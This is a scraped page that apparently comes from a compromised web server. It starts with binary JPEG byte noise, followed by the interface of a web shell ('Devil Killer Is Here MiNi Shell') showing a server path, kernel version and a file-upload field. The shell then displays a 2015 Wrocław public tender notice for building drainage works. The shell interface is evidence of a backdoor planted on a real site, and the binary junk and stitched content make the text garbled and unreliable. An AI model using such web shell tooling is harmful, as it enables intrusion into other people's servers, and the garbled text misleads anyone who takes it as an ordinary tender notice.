JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150601/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150601/130238-N-2015.html

<p class="kh_header"><b>Wrocław: Wykonanie robót budowlanych polegających na wykonaniu drenażu opaskowego budynku mieszkalnego wielorodzinnego przy ul. Kamieńskiego 256 we Wrocławiu wraz z opracowaniem dokumentacji projektowej
znak postępowania: WM/SZP/PN/94/2014/G</b><br>
<b>Numer ogłoszenia: 130238 - 2015; data zamieszczenia: 01.06.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wrocławskie Mieszkania Sp. z o.o. , ul. Mikołaja Reja 53-55, 50-343 Wrocław, woj. dolnośląskie, tel. 71 3235700, faks 71 3235750.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.wm.wroc.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie robót budowlanych polegających na wykonaniu drenażu opaskowego budynku mieszkalnego wielorodzinnego przy ul. Kamieńskiego 256 we Wrocławiu wraz z opracowaniem dokumentacji projektowej
znak postępowania: WM/SZP/PN/94/2014/G.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Rodzaj zamówienia: robota budowlana.2.Przedmiotem zamówienia jest wykonanie dokumentacji projektowej, zwanej dalej Dokumentacją wraz z przeniesieniem autorskich praw majątkowych do Dokumentacji oraz uzyskaniem ostatecznej decyzji o pozwoleniu na roboty budowlane (Etap I) i na jej podstawie wykonanie robót budowlanych zwanych dalej Robotami budowlanymi polegających na wykonaniu drenażu opaskowego budynku mieszkalnego wielorodzinnego przy ul. Kamieńskiego 256 we Wrocławiu wraz z przeniesieniem autorskich praw majątkowych do dokumentacji powykonawczej (Etap II).3.	Kod CPV (Wspólny Słownik Zamówień): 71221000-3 usługi architektoniczne w zakresie obiektów budowlanych, 71242000-6 Przygotowanie przedsięwzięcia i projektu, oszacowanie kosztów, 71250000-5 Usługi architektoniczne, inżynieryjne i pomiarowe, 71320000-7 Usługi inżynieryjne w zakresie projektowania, 45000000-7 Roboty budowlane. 4.Szczegółowy zakres zamówienia i obowiązki stron określają: 1)Program Funkcjonalno-Użytkowy - załącznik nr 4 do SIWZ; 2)Projekt umowy - załącznik nr 5 do SIWZ. 5.Szczegółowy zakres przedmiotu umowy został podzielony na dwa etapy i obejmuje:
1)	Etap I -  obejmuje wykonanie Dokumentacji zgodnie z wymogami określonymi 
w § 4 ust. 1 rozporządzenia Ministra Infrastruktury z dnia 2 września 2004 r. 
w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz.U. z 2013 r. poz. 1129), która powinna zawierać:
a)	Projekt budowlany opracowany zgodnie z rozporządzeniem Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 25 kwietnia 2012 r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz.U. z 2012 r. poz. 462 z późn. zm.) oraz zgodnie z wymogami określonymi w § 4 ust. 1 rozporządzenia Ministra Infrastruktury w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego - w ilościach wymaganych urzędowo oraz 3 egz. dla Zamawiającego;
b)	Projekt wykonawczy opracowany zgodnie z rozporządzeniem Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 25 kwietnia 2012 r. w sprawie szczegółowego zakresu i formy projektu budowlanego oraz zgodnie z wymogami określonymi w § 4 ust. 1 rozporządzenia Ministra Infrastruktury w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego - 
w ilościach wymaganych urzędowo oraz 3 egz. dla Zamawiającego;
c)	Specyfikację techniczną wykonania i odbioru robót budowlanych wykonywanych 
w ramach remontu sporządzoną na podstawie rozporządzenia Ministra Infrastruktury 
z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym 
(Dz.U. z 2004 r. Nr 130, poz. 1389) - 2 egzemplarze;
d)	Informację dotyczącą bezpieczeństwa i ochrony zdrowia - opracowaną zgodnie 
z rozporządzeniem Ministra Infrastruktury w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego - 4 egzemplarze;
e)	Przedmiar robót opracowany zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym 
(Dz.U. nr 130, poz. 1389) - 2 egzemplarze.
2)	Dokumentację należy przekazać w wersjach papierowych w ilościach wskazanych powyżej oraz także w wersji elektronicznej (na płytach CD) w formacie edytowalnym (dwg) - 2 szt. oraz w formacie nieedytowalnym (PDF) - 2 szt., przy czym przedmiar robót zapisany 
w programie NORMA (ath) lub w innym, aktywnie otwieranym przez program NORMA -  zapis na płycie CD.
3)	Dokumentację Wykonawca zobowiązuje się wykonać zgodnie z przepisami ustawy z dnia 
7 lipca 1994 r. Prawo budowlane (Dz.U. z 2013 r. poz. 1409 z późn. zm.), ustawy z dnia 
29 stycznia 2004 r. Prawo zamówień publicznych (Dz.U. z 2013 r. poz. 907 z późn. zm.) oraz przepisami wykonawczymi do tych ustaw: m.in. rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego i rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym oraz innymi obowiązującymi przepisami prawa.
4)	Etap II - obejmuje wykonanie Robót budowlanych, w tym m.in.:
a)	Prace przygotowawcze;
b)	Roboty ziemne
c)	Roboty montażowe
d)	Roboty wykończeniowe
6.	Roboty budowlane należy wykonać zgodnie z przepisami ustawy Prawo budowlane, rozporządzeniem Ministra Infrastruktury z dnia 6 lutego 2003 r. w sprawie bezpieczeństwa 
i higieny pracy podczas wykonywania robót budowlanych (Dz.U. Nr 47, poz. 401) i Polskimi Normami, a użyte materiały powinny spełniać wymogi określone w art. 10 Prawa budowlanego. Z odpadami powstałymi w trakcie realizacji przedmiotu umowy należy postępować zgodnie 
z zapisami ustawy z dnia 14 grudnia 2012 r. o odpadach (Dz.U. z 2013 r. poz. 21 z późn. zm.) 
i ustawy z dnia 27 kwietnia 2001 r. Prawo ochrony środowiska (Dz.U. z 2013 r. poz. 1232 
z późn. zm.)..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.22.10.00-3, 71.24.20.00-6, 71.25.00.00-5, 71.32.00.00-7, 45.00.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 150.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Oferta musi być zabezpieczona wadium w wysokości: 1 800,00 zł (słownie: jeden tysiąc osiemset złotych i 00 100).2.Wadium może być wnoszone w jednej lub kilku następujących formach:  1)pieniądzu,2)poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,3)gwarancjach bankowych,4)gwarancjach ubezpieczeniowych,5)poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2007 r. Nr 42, poz. 275).3.Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego - Gminy Wrocław nr 41 1020 5226 0000 6102 0417 7663 tak, aby kwota wadium znalazła się na wskazanym koncie nie później niż w dniu i godzinie przewidzianej na składanie ofert - podając w tytule na dowodzie wpłaty numer postępowania lub nazwę postępowania. 4.Wadium należy wnieść przed upływem terminu składania ofert, przy czym wniesienie wadium w pieniądzu za pomocą przelewu bankowego, Zamawiający będzie uważał za wniesione w terminie tylko wówczas, gdy bank prowadzący rachunek Zamawiającego potwierdzi, że środki zostały zaksięgowane na koncie Zamawiającego przed upływem terminu składania ofert.5.Wykonawca, który nie wniesie wadium w wyznaczonym terminie zostanie wykluczony z prowadzonego postępowania. Terminowe wniesienie wadium (w każdej z dopuszczonych form jego wniesienia) Zamawiający sprawdzi w ramach własnych czynności proceduralnych.
6.Wykonawca do oferty załącza potwierdzenie polecenia przelewu.7.W przypadku wniesienia wadium w innej formie niż pieniądz, jego dowód wniesienia w formie oryginału należy dołączyć do oferty w taki sposób, by nie tworzył z nią całości, tj. by nie był związany na stałe z ofertą. Zaleca się, aby jego kopię opatrzoną klauzulą za zgodność z oryginałem i poświadczoną za zgodność z oryginałem Wykonawca dołączył do oferty.8.Wadium wnoszone w innej formie niż pieniądz musi mieć postać oświadczenia Gwaranta, w którym Gwarant zobowiązuje się nieodwołalnie i bezwarunkowo, na pierwsze żądanie zapłacić Zamawiającemu kwotę gwarancji w przypadkach określonych ustawą Pzp, tj. gdy Wykonawca:1)odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;2)nie wniesie wymaganego zabezpieczenia należytego wykonania umowy;3)zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy;4)w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Pzp, z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy Pzp, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5 ustawy Pzp, lub informacji o tym, że nie należy do grupy kapitałowej lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3 ustawy Pzp, co powodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej. 9.Zamawiający dokonuje zwrotu, a także zatrzymania wadium na zasadach określonych w art. 46 ustawy Pzp.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek udziału w postępowaniu został spełniony na podstawie złożonego oświadczenia z art. 22 ust. 1 ustawy Pzp (załącznik nr 2a do SIWZ).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek udziału w postępowaniu został spełniony na podstawie złożonego oświadczenia z art. 22 ust. 1 ustawy Pzp (załącznik nr 2a do SIWZ).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek udziału w postępowaniu został spełniony na podstawie złożonego oświadczenia z art. 22 ust. 1 ustawy Pzp (załącznik nr 2a do SIWZ).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek udziału w postępowaniu został spełniony, jeżeli Wykonawca wykaże, że dysponuje:co najmniej jedną osobą, która będzie uczestniczyć w wykonywaniu zamówienia, posiadającą uprawnienia budowlane do projektowania i kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej i sprawdzania projektów architektoniczno-budowlanych,oraz co najmniej jedną osobą, która będzie uczestniczyć w wykonywaniu zamówienia, posiadającą uprawnienia budowlane do projektowania o specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych do projektowania bez ograniczeń lub w ograniczonym zakresie (dla Zespołu projektowego),oraz co najmniej jedną osobą, która będzie uczestniczyć w wykonywaniu zamówienia, posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci instalacji i  urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych do kierowania robotami budowlanymi bez ograniczeń lub w ograniczonym zakresie (dla Zespołu projektowego). Zamawiający dopuszcza możliwość posiadania wszystkich lub części wymaganych uprawnień przez jedną osobę.Przez uprawnienia należy rozumieć: uprawnienia budowlane, o których mowa w ustawie z dnia 7 lipca 1994 r. Prawo budowlane (Dz.U. z 2013 poz. 1409 ze zm.) oraz w Rozporządzeniu Ministra Infrastruktury i Rozwoju z dnia 11 września 2014r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz.U. z 2014r., poz. 1278) lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie uprzednio obowiązujących przepisów prawa, lub uznane przez właściwy organ, zgodnie z ustawą z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U. z 2008 r. poz. 394 ze zm.) do pełnienia samodzielnej funkcji w budownictwie.Z uwagi na specyfikę przedmiotu zamówienia, w przypadku, gdy Wykonawca wykazując spełnienie warunków udziału w postępowaniu będzie polegać na osobach zdolnych do wykonania zamówienia innych podmiotów wówczas niezbędny jest udział tych podmiotów w realizacji zamówienia (w formie podwykonawstwa).Zamawiający żąda wskazania przez Wykonawcę w Formularzu ofertowym części zamówienia, której wykonanie powierzy Podwykonawcom i podania przez Wykonawcę  nazw (firm) Podwykonawców, na których zasoby Wykonawca powołuje się na zasadach określonych w art. 26 ust. 2b ustawy, w celu wykazania spełnienia warunków udziału w postępowaniu, o których mowa w rozdz. IX SIWZ.
Jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby Wykonawca powoływał się, na zasadach określonych w art. 26 ust. 2b ustawy Pzp, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp, Wykonawca jest obowiązany wykazać Zamawiającemu, iż proponowany inny podwykonawca lub wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek udziału w postępowaniu został spełniony na podstawie złożonego oświadczenia z art. 22 ust. 1 ustawy Pzp (załącznik nr 2a do SIWZ).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Wykonawcy wspólnie ubiegający się o udzielenie zamówienia:1)składają wspólnie oświadczenia wymienione w rozdz. X pkt 1 SIWZ, 2)każdy z Wykonawców składa oświadczenie o braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 ustawy Pzp;
3)	każdy z Wykonawców składa listę albo informację, o której mowa w rozdz. X pkt 4 SIWZ.2.Wykonawca może polegać na osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, że będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia - w oryginale (wzór stanowi zał. nr 6 do SIWZ), z którego wynikać będzie jednoznacznie:a)zakres dostępnych Wykonawcy zasobów innego podmiotu,b)sposób wykorzystania zasobów innego podmiotu, przez Wykonawcę, przy wykonywaniu zamówienia,c)charakter stosunku, jaki będzie łączył Wykonawcę z innym podmiotem,d)zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia.3.Wymagany jest jeden egzemplarz oferty, który musi zawierać m.in.1)	formularz oferty (załącznik nr 1 SIWZ),2)	dowód wpłaty wadium,3)	oświadczenia i dokumenty wskazane w rozdz. X i XI SIWZ.4.W przypadku podpisania oferty przez pełnomocnika, pełnomocnictwo winno mieć formę oryginału lub kopii poświadczonej za zgodność z oryginałem przez notariusza i winno być załączone do oferty.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Okres gwarancji na Dokumentację i Roboty budowlane - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>I.ZMIANY DO UMOWY.1.	Każda ze stron może wnieść o zmianę umowy w trybie pisemnym, jeżeli zmiana będzie prowadzić do:1)obniżenia kosztu wykonania robót lub kosztów użytkowania obiektu;2)poprawy jakości robót przy braku zmiany ceny końcowej;3)podniesienia bezpieczeństwa,z tym zastrzeżeniem, że zmiany te nie spowodują zmiany terminu realizacji oraz podwyższenia wynagrodzenia.2.Strony również mogą zmienić termin realizacji przedmiotu umowy na pisemny wniosek Wykonawcy złożony w terminie 5 dni od daty wystąpienia niżej wymienionych przesłanek, zawierający dokładny opis podstawy do zmiany terminu, w przypadku wystąpienia następujących okoliczności:1)nieterminowego przekazania terenu budowy;2)opóźnienia w zakresie dokonywania odbiorów lub prób końcowych;3)zawieszenia przez Zamawiającego wykonania robót;4)siły wyższej,  o ile  uniemożliwia ona prowadzenie robót przez okres dłuższy niż 10 dni,
o ile Wykonawca realizuje prawidłowo postanowienia niniejszej umowy.3.Zamawiający przewiduje możliwość zmiany terminu realizacji umowy określonego w § 2 ust. 1 umowy w przypadku konieczności dokonywania dodatkowych uzgodnień z właściwymi organami, oczekiwania na decyzje i postanowienia tychże organów, o ile Wykonawca należycie realizuje obowiązki wynikające z umowy, przy czym pod pojęciem należytego realizowania obowiązków wynikających z umowy Strony rozumieć będą w szczególności wykonanie umowy zgodnie z postanowieniami oraz podejmowanie poszczególnych czynności w terminach uwzględniających działania organów administracji.4.O wystąpieniu okoliczności, o których mowa w ust. 3, Wykonawca jest zobowiązany w terminie do 3 dni roboczych informować Zamawiającego pisemnie, z zastrzeżeniem, że w przypadku gdy Wykonawca nie poinformuje o powyższym Zamawiającego, to strony zgodnie uznają, że Wykonawca uznał, iż okoliczności, o których mowa w ust. 3 nie będą miały wpływu na wykonanie przedmiotu umowy i Wykonawca przyjął na siebie odpowiedzialność za ich wpływ na wykonanie przedmiotu umowy.5.Zamawiający odmawia zmiany terminu wykonania umowy, jeżeli uzna, że wystąpienie wskazanych wyżej okoliczności nie miało wpływu na termin realizacji zamówienia.6.Wykonawca nie będzie miał prawa do przedłużenia terminu realizacji umowy, jeżeli Zamawiający udowodni, że przedłużenie terminu wynika z przyczyn leżących po stronie Wykonawcy, lub wystąpił z wnioskiem o przedłużenie terminu  po terminie wskazanym w § 2 ust. 1 umowy.7.Wykonawca może także zaproponować Zamawiającemu poprawienie jakości lub innych parametrów charakterystycznych dla danego elementu robót budowlanych lub zmianę technologii, aktualizację rozwiązań z uwagi na postęp technologiczny lub zmiany obowiązujących przepisów, zmianę wyposażenia, zmianę wymiarów. Zamawiający każdorazowo indywidualnie rozpatrzy okoliczności przemawiające za przyjęciem propozycji Wykonawcy. Zmiana technologii nie może prowadzić do zwiększenia ceny ofertowej.8.Strony dopuszczają możliwość zmiany w trakcie realizacji umowy terminu wykonania zamówienia.9.Strony dopuszczają możliwość zmiany w trakcie realizacji umowy kluczowego personelu Wykonawcy lub Zamawiającego. 10.Strony dopuszczają także możliwość:1)zmiany podwykonawców, zmiany zakresu realizacji Umowy z udziałem podwykonawców lub rezygnacji z podwykonawców; 2)wprowadzenia podwykonawców, w takim przypadku do umowy zostaną wprowadzone zapisy dotyczące podwykonawstwa, określone w projekcie umowy załączonym do SIWZ. II.Wszelkie zmiany do umowy, za wyjątkiem zmian adresowych Wykonawcy i Zamawiającego oraz zmian osób wskazanych w § 12 ust. 1 i 2 umowy, wymagają pod rygorem nieważności zachowania formy pisemnej w formie aneksu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.wm.wroc.pl/<br>
